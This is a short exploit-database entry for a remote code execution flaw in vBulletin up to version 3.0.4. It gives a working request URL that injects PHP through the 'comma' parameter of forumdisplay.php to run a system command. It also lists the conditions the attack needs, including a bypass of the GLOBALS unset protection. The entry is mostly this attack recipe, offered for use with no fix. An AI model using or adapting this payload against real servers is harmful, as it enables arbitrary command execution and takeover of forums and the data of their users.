vBulletin <= 3.0.4 "forumdisplay.php" Code Execution

2005-02-14 00:00:00

Exploit:
----------------
http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."

Conditions:
----------------
1st condition : $vboptions['showforumusers'] == True , the admin must set
showforumusers ON in vbulletin options.

2nd condition : $bbuserinfo['userid'] == 0 , you must be an visitor/guest.

3rd condition : $DB_site->fetch_array($forumusers) == True , when you
visit the forums, it must has at least one user show the forum.

4th condition : magic_quotes_gpc must be OFF

SPECIAL condition : you must bypass unset($GLOBALS["$_arrykey"]) code in
init.php by secret array GLOBALS[]=1 ;)))

#

Fixes

No fixes

In order to submit a new fix you need to be registered.